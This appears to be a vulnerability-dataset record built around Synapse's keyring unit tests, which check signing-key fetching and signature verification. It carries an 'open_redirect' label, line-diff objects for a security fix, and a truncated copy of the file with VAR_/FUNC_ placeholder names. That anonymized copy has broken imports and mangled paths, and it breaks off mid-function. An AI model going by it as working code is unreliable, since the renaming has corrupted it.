VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_invalid_perspectives_responses(self):
"""Check that invalid responses from the perspectives server are rejected"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
def build_response():
return self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
def get_key_from_perspectives(response):
fetcher = PerspectivesKeyFetcher(self.hs)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
return self.get_success(fetcher.get_keys(keys_to_fetch))
# start with a valid response so we can check we are testing the right thing
response = build_response()
keys = get_key_from_perspectives(response)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.verify_key, testverifykey)
# remove the perspectives server's signature
response = build_response()
del response["signatures"][self.mock_perspective_server.server_name]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing persp server sig")
# remove the origin server's signature
response = build_response()
del response["signatures"][SERVER_NAME]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing origin server sig")
def get_key_id(key):
"""Get the matrix ID tag for a given SigningKey or VerifyKey"""
return "%s:%s" % (key.alg, key.version)
@defer.inlineCallbacks
def run_in_context(f, *args, **kwargs):
with LoggingContext("testctx") as ctx:
# we set the "request" prop to make it easier to follow what's going on in the
# logs.
ctx.request = "testctx"
rv = yield f(*args, **kwargs)
return rv
def _verify_json_for_server(kr, *args):
"""thin wrapper around verify_json_for_server which makes sure it is wrapped
with the patched defer.inlineCallbacks.
"""
@defer.inlineCallbacks
def v():
rv1 = yield kr.verify_json_for_server(*args)
return rv1
return run_in_context(v)
| # -*- coding: utf-8 -*-
# Copyright 2017 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import encode_verify_key_base64, get_verify_key
from twisted.internet import defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class MockPerspectiveServer:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def get_verify_keys(self):
vk = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (vk.alg, vk.version): encode_verify_key_base64(vk)}
def get_signed_key(self, server_name, verify_key):
key_id = "%s:%s" % (verify_key.alg, verify_key.version)
res = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {key_id: {"key": encode_verify_key_base64(verify_key)}},
}
self.sign_response(res)
return res
def sign_response(self, res):
signedjson.sign.sign_json(res, self.server_name, self.key)
@logcontext_clean
class KeyringTestCase(unittest.HomeserverTestCase):
def check_context(self, val, expected):
self.assertEquals(getattr(current_context(), "request", None), expected)
return val
def test_verify_json_objects_for_server_awaits_previous_requests(self):
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock()
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
# a signed object that we are going to try to validate
key1 = signedjson.key.generate_signing_key(1)
json1 = {}
signedjson.sign.sign_json(json1, "server10", key1)
# start off a first set of lookups. We make the mock fetcher block until this
# deferred completes.
first_lookup_deferred = Deferred()
async def first_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(keys_to_fetch, {"server10": {get_key_id(key1): 0}})
await make_deferred_yieldable(first_lookup_deferred)
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.side_effect = first_lookup_fetch
async def first_lookup():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
res_deferreds = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test10"), ("server11", {}, 0, "test11")]
)
# the unsigned json should be rejected pretty quickly
self.assertTrue(res_deferreds[1].called)
try:
await res_deferreds[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(res_deferreds[0].called)
res_deferreds[0].addBoth(self.check_context, None)
await make_deferred_yieldable(res_deferreds[0])
d0 = ensureDeferred(first_lookup())
mock_fetcher.get_keys.assert_called_once()
# a second request for a server with outstanding requests
# should block rather than start a second call
async def second_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.reset_mock()
mock_fetcher.get_keys.side_effect = second_lookup_fetch
second_lookup_state = [0]
async def second_lookup():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
res_deferreds_2 = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test")]
)
res_deferreds_2[0].addBoth(self.check_context, None)
second_lookup_state[0] = 1
await make_deferred_yieldable(res_deferreds_2[0])
second_lookup_state[0] = 2
d2 = ensureDeferred(second_lookup())
self.pump()
# the second request should be pending, but the fetcher should not yet have been
# called
self.assertEqual(second_lookup_state[0], 1)
mock_fetcher.get_keys.assert_not_called()
# complete the first request
first_lookup_deferred.callback(None)
# and now both verifications should succeed.
self.get_success(d0)
self.get_success(d2)
def test_verify_json_for_server(self):
kr = keyring.Keyring(self.hs)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), 1000))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should succeed on a signed object
d = _verify_json_for_server(kr, "server9", json1, 500, "test signed")
# self.assertFalse(d.called)
self.get_success(d)
def test_verify_json_for_server_with_null_valid_until_ms(self):
"""Tests that we correctly handle key requests for keys we've stored
with a null `ts_valid_until_ms`
"""
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(return_value=make_awaitable({}))
kr = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), mock_fetcher)
)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), None))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should fail on a signed object with a non-zero minimum_valid_until_ms,
# as it tries to refetch the keys and fails.
d = _verify_json_for_server(
kr, "server9", json1, 500, "test signed non-zero min"
)
self.get_failure(d, SynapseError)
# We expect the keyring tried to refetch the key once.
mock_fetcher.get_keys.assert_called_once_with(
{"server9": {get_key_id(key1): 500}}
)
# should succeed on a signed object with a 0 minimum_valid_until_ms
d = _verify_json_for_server(
kr, "server9", json1, 0, "test signed with zero min"
)
self.get_success(d)
def test_verify_json_dedupes_key_requests(self):
"""Two requests for the same key should be deduped."""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys(keys_to_fetch):
# there should only be one request object (with the max validity)
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(side_effect=get_keys)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
# the first request should succeed; the second should fail because the key
# has expired
results = kr.verify_json_objects_for_server(
[("server1", json1, 500, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to the fetcher
mock_fetcher.get_keys.assert_called_once()
def test_verify_json_falls_back_to_other_fetchers(self):
"""If the first fetcher cannot provide a recent enough key, we fall back"""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys1(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {get_key_id(key1): FetchKeyResult(get_verify_key(key1), 800)}
}
async def get_keys2(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher1 = keyring.KeyFetcher()
mock_fetcher1.get_keys = Mock(side_effect=get_keys1)
mock_fetcher2 = keyring.KeyFetcher()
mock_fetcher2.get_keys = Mock(side_effect=get_keys2)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher1, mock_fetcher2))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
results = kr.verify_json_objects_for_server(
[("server1", json1, 1200, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to each fetcher
mock_fetcher1.get_keys.assert_called_once()
mock_fetcher2.get_keys.assert_called_once()
@logcontext_clean
class ServerKeyFetcherTestCase(unittest.HomeserverTestCase):
    """Tests for ServerKeyFetcher, which fetches keys directly from the origin
    server's /_matrix/key/v2/server endpoint.
    """

    def make_homeserver(self, reactor, clock):
        # route outbound federation HTTP through a mock so the test can serve
        # canned key responses
        self.http_client = Mock()
        hs = self.setup_test_homeserver(federation_http_client=self.http_client)
        return hs

    def test_get_keys_from_server(self):
        """Fetch a key from the origin server and check it is stored correctly."""
        # arbitrarily advance the clock a bit
        self.reactor.advance(100)

        SERVER_NAME = "server2"
        fetcher = ServerKeyFetcher(self.hs)
        testkey = signedjson.key.generate_signing_key("ver1")
        testverifykey = signedjson.key.get_verify_key(testkey)
        testverifykey_id = "ed25519:ver1"
        VALID_UNTIL_TS = 200 * 1000

        # valid response, signed by the origin server itself
        response = {
            "server_name": SERVER_NAME,
            "old_verify_keys": {},
            "valid_until_ts": VALID_UNTIL_TS,
            "verify_keys": {
                testverifykey_id: {
                    "key": signedjson.key.encode_verify_key_base64(testverifykey)
                }
            },
        }
        signedjson.sign.sign_json(response, SERVER_NAME, testkey)

        async def get_json(destination, path, **kwargs):
            # the fetcher should hit the origin server's key endpoint
            self.assertEqual(destination, SERVER_NAME)
            self.assertEqual(path, "/_matrix/key/v2/server/key1")
            return response

        self.http_client.get_json.side_effect = get_json

        keys_to_fetch = {SERVER_NAME: {"key1": 0}}
        keys = self.get_success(fetcher.get_keys(keys_to_fetch))
        k = keys[SERVER_NAME][testverifykey_id]
        self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
        self.assertEqual(k.verify_key, testverifykey)
        self.assertEqual(k.verify_key.alg, "ed25519")
        self.assertEqual(k.verify_key.version, "ver1")

        # check that the perspectives store is correctly updated
        lookup_triplet = (SERVER_NAME, testverifykey_id, None)
        key_json = self.get_success(
            self.hs.get_datastore().get_server_keys_json([lookup_triplet])
        )
        res = key_json[lookup_triplet]
        self.assertEqual(len(res), 1)
        res = res[0]
        self.assertEqual(res["key_id"], testverifykey_id)
        self.assertEqual(res["from_server"], SERVER_NAME)
        self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
        self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)

        # we expect it to be encoded as canonical json *before* it hits the db
        self.assertEqual(
            bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
        )

        # change the server name: the result should be ignored
        # (this mutates the same dict the mock returns, so the next fetch sees
        # a response whose server_name does not match the requested server)
        response["server_name"] = "OTHER_SERVER"

        keys = self.get_success(fetcher.get_keys(keys_to_fetch))
        self.assertEqual(keys, {})
class PerspectivesKeyFetcherTestCase(unittest.HomeserverTestCase):
    """Tests for PerspectivesKeyFetcher, which fetches keys via a trusted
    notary ("perspectives") server's /_matrix/key/v2/query endpoint.
    """

    def make_homeserver(self, reactor, clock):
        # the mock perspectives server provides the notary signing key; the
        # homeserver is configured to trust it
        self.mock_perspective_server = MockPerspectiveServer()
        self.http_client = Mock()

        config = self.default_config()
        config["trusted_key_servers"] = [
            {
                "server_name": self.mock_perspective_server.server_name,
                "verify_keys": self.mock_perspective_server.get_verify_keys(),
            }
        ]

        return self.setup_test_homeserver(
            federation_http_client=self.http_client, config=config
        )

    def build_perspectives_response(
        self, server_name: str, signing_key: SigningKey, valid_until_ts: int,
    ) -> dict:
        """
        Build a valid perspectives server response to a request for the given key
        """
        verify_key = signedjson.key.get_verify_key(signing_key)
        verifykey_id = "%s:%s" % (verify_key.alg, verify_key.version)

        response = {
            "server_name": server_name,
            "old_verify_keys": {},
            "valid_until_ts": valid_until_ts,
            "verify_keys": {
                verifykey_id: {
                    "key": signedjson.key.encode_verify_key_base64(verify_key)
                }
            },
        }
        # the response must be signed by both the origin server and the perspectives
        # server.
        signedjson.sign.sign_json(response, server_name, signing_key)
        self.mock_perspective_server.sign_response(response)
        return response

    def expect_outgoing_key_query(
        self, expected_server_name: str, expected_key_id: str, response: dict
    ) -> None:
        """
        Tell the mock http client to expect a perspectives-server key query
        """

        async def post_json(destination, path, data, **kwargs):
            # queries must go to the configured perspectives server
            self.assertEqual(destination, self.mock_perspective_server.server_name)
            self.assertEqual(path, "/_matrix/key/v2/query")

            # check that the request is for the expected key
            q = data["server_keys"]
            self.assertEqual(list(q[expected_server_name].keys()), [expected_key_id])
            return {"server_keys": [response]}

        self.http_client.post_json.side_effect = post_json

    def test_get_keys_from_perspectives(self):
        """Fetch another server's key via perspectives and check storage."""
        # arbitrarily advance the clock a bit
        self.reactor.advance(100)

        fetcher = PerspectivesKeyFetcher(self.hs)

        SERVER_NAME = "server2"
        testkey = signedjson.key.generate_signing_key("ver1")
        testverifykey = signedjson.key.get_verify_key(testkey)
        testverifykey_id = "ed25519:ver1"
        VALID_UNTIL_TS = 200 * 1000

        response = self.build_perspectives_response(
            SERVER_NAME, testkey, VALID_UNTIL_TS,
        )

        self.expect_outgoing_key_query(SERVER_NAME, "key1", response)

        keys_to_fetch = {SERVER_NAME: {"key1": 0}}
        keys = self.get_success(fetcher.get_keys(keys_to_fetch))
        self.assertIn(SERVER_NAME, keys)
        k = keys[SERVER_NAME][testverifykey_id]
        self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
        self.assertEqual(k.verify_key, testverifykey)
        self.assertEqual(k.verify_key.alg, "ed25519")
        self.assertEqual(k.verify_key.version, "ver1")

        # check that the perspectives store is correctly updated
        lookup_triplet = (SERVER_NAME, testverifykey_id, None)
        key_json = self.get_success(
            self.hs.get_datastore().get_server_keys_json([lookup_triplet])
        )
        res = key_json[lookup_triplet]
        self.assertEqual(len(res), 1)
        res = res[0]
        self.assertEqual(res["key_id"], testverifykey_id)
        self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
        self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
        self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)

        # the stored key_json must be the canonical-json encoding of the response
        self.assertEqual(
            bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
        )

    def test_get_perspectives_own_key(self):
        """Check that we can get the perspectives server's own keys

        This is slightly complicated by the fact that the perspectives server may
        use different keys for signing notary responses.
        """
        # arbitrarily advance the clock a bit
        self.reactor.advance(100)

        fetcher = PerspectivesKeyFetcher(self.hs)

        SERVER_NAME = self.mock_perspective_server.server_name
        testkey = signedjson.key.generate_signing_key("ver1")
        testverifykey = signedjson.key.get_verify_key(testkey)
        testverifykey_id = "ed25519:ver1"
        VALID_UNTIL_TS = 200 * 1000

        response = self.build_perspectives_response(
            SERVER_NAME, testkey, VALID_UNTIL_TS
        )

        self.expect_outgoing_key_query(SERVER_NAME, "key1", response)

        keys_to_fetch = {SERVER_NAME: {"key1": 0}}
        keys = self.get_success(fetcher.get_keys(keys_to_fetch))
        self.assertIn(SERVER_NAME, keys)
        k = keys[SERVER_NAME][testverifykey_id]
        self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
        self.assertEqual(k.verify_key, testverifykey)
        self.assertEqual(k.verify_key.alg, "ed25519")
        self.assertEqual(k.verify_key.version, "ver1")

        # check that the perspectives store is correctly updated
        lookup_triplet = (SERVER_NAME, testverifykey_id, None)
        key_json = self.get_success(
            self.hs.get_datastore().get_server_keys_json([lookup_triplet])
        )
        res = key_json[lookup_triplet]
        self.assertEqual(len(res), 1)
        res = res[0]
        self.assertEqual(res["key_id"], testverifykey_id)
        self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
        self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
        self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)

        self.assertEqual(
            bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
        )

    def test_invalid_perspectives_responses(self):
        """Check that invalid responses from the perspectives server are rejected"""
        # arbitrarily advance the clock a bit
        self.reactor.advance(100)

        SERVER_NAME = "server2"
        testkey = signedjson.key.generate_signing_key("ver1")
        testverifykey = signedjson.key.get_verify_key(testkey)
        testverifykey_id = "ed25519:ver1"
        VALID_UNTIL_TS = 200 * 1000

        def build_response():
            # fresh copy each time, since the tests below mutate it
            return self.build_perspectives_response(
                SERVER_NAME, testkey, VALID_UNTIL_TS
            )

        def get_key_from_perspectives(response):
            fetcher = PerspectivesKeyFetcher(self.hs)
            keys_to_fetch = {SERVER_NAME: {"key1": 0}}
            self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
            return self.get_success(fetcher.get_keys(keys_to_fetch))

        # start with a valid response so we can check we are testing the right thing
        response = build_response()
        keys = get_key_from_perspectives(response)
        k = keys[SERVER_NAME][testverifykey_id]
        self.assertEqual(k.verify_key, testverifykey)

        # remove the perspectives server's signature
        response = build_response()
        del response["signatures"][self.mock_perspective_server.server_name]
        keys = get_key_from_perspectives(response)
        self.assertEqual(keys, {}, "Expected empty dict with missing persp server sig")

        # remove the origin server's signature
        response = build_response()
        del response["signatures"][SERVER_NAME]
        keys = get_key_from_perspectives(response)
        self.assertEqual(keys, {}, "Expected empty dict with missing origin server sig")
def get_key_id(key):
    """Return the matrix key ID ("<alg>:<version>") for a SigningKey or VerifyKey."""
    return f"{key.alg}:{key.version}"
@defer.inlineCallbacks
def run_in_context(f, *args, **kwargs):
    """Run ``f(*args, **kwargs)`` inside a fresh "testctx" logging context."""
    with LoggingContext("testctx") as test_context:
        # Tag the context's "request" so log lines emitted by ``f`` are easy
        # to attribute when reading the test output.
        test_context.request = "testctx"
        result = yield f(*args, **kwargs)
    return result
def _verify_json_for_server(kr, *args):
    """Call ``kr.verify_json_for_server(*args)`` inside a logging context.

    Thin wrapper around verify_json_for_server which makes sure the call is
    wrapped with the patched defer.inlineCallbacks.
    """

    @defer.inlineCallbacks
    def _inner():
        verified = yield kr.verify_json_for_server(*args)
        return verified

    return run_in_context(_inner)
| open_redirect | {
"code": [
" hs = self.setup_test_homeserver(http_client=self.http_client)",
" return self.setup_test_homeserver(http_client=self.http_client, config=config)"
],
"line_no": [
318,
398
]
} | {
"code": [
" hs = self.setup_test_homeserver(federation_http_client=self.http_client)",
" return self.setup_test_homeserver(",
" )"
],
"line_no": [
318,
398,
400
]
} |
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import .encode_verify_key_base64, get_verify_key
from twisted.internet import .defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import .keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class CLASS_0:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def FUNC_3(self):
VAR_17 = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (VAR_17.alg, VAR_17.version): encode_verify_key_base64(VAR_17)}
def FUNC_4(self, VAR_5, VAR_6):
VAR_18 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_7 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {VAR_18: {"key": encode_verify_key_base64(VAR_6)}},
}
self.sign_response(VAR_7)
return VAR_7
def FUNC_5(self, VAR_7):
signedjson.sign.sign_json(VAR_7, self.server_name, self.key)
@logcontext_clean
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_6(self, VAR_8, VAR_9):
self.assertEquals(getattr(current_context(), "request", None), VAR_9)
return VAR_8
def FUNC_7(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock()
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server10", VAR_20)
VAR_22 = Deferred()
async def FUNC_20(VAR_23):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(VAR_23, {"server10": {FUNC_0(VAR_20): 0}})
await make_deferred_yieldable(VAR_22)
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.side_effect = FUNC_20
async def FUNC_21():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
VAR_52 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test10"), ("server11", {}, 0, "test11")]
)
self.assertTrue(VAR_52[1].called)
try:
await VAR_52[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(VAR_52[0].called)
VAR_52[0].addBoth(self.check_context, None)
await make_deferred_yieldable(VAR_52[0])
VAR_24 = ensureDeferred(FUNC_21())
VAR_19.get_keys.assert_called_once()
async def FUNC_22(VAR_23):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.reset_mock()
VAR_19.get_keys.side_effect = FUNC_22
VAR_25 = [0]
async def FUNC_23():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
VAR_53 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test")]
)
VAR_53[0].addBoth(self.check_context, None)
VAR_25[0] = 1
await make_deferred_yieldable(VAR_53[0])
VAR_25[0] = 2
VAR_26 = ensureDeferred(FUNC_23())
self.pump()
self.assertEqual(VAR_25[0], 1)
VAR_19.get_keys.assert_not_called()
VAR_22.callback(None)
self.get_success(VAR_24)
self.get_success(VAR_26)
def FUNC_8(self):
VAR_4 = keyring.Keyring(self.hs)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), 1000))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(VAR_4, "server9", VAR_21, 500, "test signed")
self.get_success(VAR_28)
def FUNC_9(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(return_value=make_awaitable({}))
VAR_4 = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), VAR_19)
)
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_27 = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", FUNC_0(VAR_20), FetchKeyResult(get_verify_key(VAR_20), None))],
)
self.get_success(VAR_27)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server9", VAR_20)
VAR_28 = FUNC_2(VAR_4, "server9", {}, 0, "test unsigned")
self.get_failure(VAR_28, SynapseError)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 500, "test signed non-zero min"
)
self.get_failure(VAR_28, SynapseError)
VAR_19.get_keys.assert_called_once_with(
{"server9": {FUNC_0(VAR_20): 500}}
)
VAR_28 = FUNC_2(
VAR_4, "server9", VAR_21, 0, "test signed with zero min"
)
self.get_success(VAR_28)
def FUNC_10(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_24(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock(side_effect=FUNC_24)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 500, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_19.get_keys.assert_called_once()
def FUNC_11(self):
VAR_20 = signedjson.key.generate_signing_key(1)
async def FUNC_25(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 800)}
}
async def FUNC_26(VAR_23):
self.assertEqual(VAR_23, {"server1": {FUNC_0(VAR_20): 1500}})
return {
"server1": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 1200)
}
}
VAR_31 = keyring.KeyFetcher()
VAR_31.get_keys = Mock(side_effect=FUNC_25)
VAR_32 = keyring.KeyFetcher()
VAR_32.get_keys = Mock(side_effect=FUNC_26)
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_31, VAR_32))
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server1", VAR_20)
VAR_29 = VAR_4.verify_json_objects_for_server(
[("server1", VAR_21, 1200, "test1"), ("server1", VAR_21, 1500, "test2")]
)
self.assertEqual(len(VAR_29), 2)
self.get_success(VAR_29[0])
VAR_30 = self.get_failure(VAR_29[1], SynapseError).value
self.assertEqual(VAR_30.errcode, "M_UNAUTHORIZED")
self.assertEqual(VAR_30.code, 401)
VAR_31.get_keys.assert_called_once()
VAR_32.get_keys.assert_called_once()
@logcontext_clean
class CLASS_2(unittest.HomeserverTestCase):
def FUNC_12(self, VAR_10, VAR_11):
self.http_client = Mock()
VAR_33 = self.setup_test_homeserver(http_client=self.http_client)
return VAR_33
def FUNC_13(self):
self.reactor.advance(100)
VAR_34 = "server2"
VAR_35 = ServerKeyFetcher(self.hs)
VAR_36 = signedjson.key.generate_signing_key("ver1")
VAR_37 = signedjson.key.get_verify_key(VAR_36)
VAR_38 = "ed25519:ver1"
VAR_39 = 200 * 1000
VAR_16 = {
"server_name": VAR_34,
"old_verify_keys": {},
"valid_until_ts": VAR_39,
"verify_keys": {
VAR_38: {
"key": signedjson.key.encode_verify_key_base64(VAR_37)
}
},
}
signedjson.sign.sign_json(VAR_16, VAR_34, VAR_36)
async def FUNC_27(VAR_40, VAR_41, **VAR_3):
self.assertEqual(VAR_40, VAR_34)
self.assertEqual(VAR_41, "/_matrix/VAR_0/v2/server/key1")
return VAR_16
self.http_client.get_json.side_effect = FUNC_27
VAR_23 = {VAR_34: {"key1": 0}}
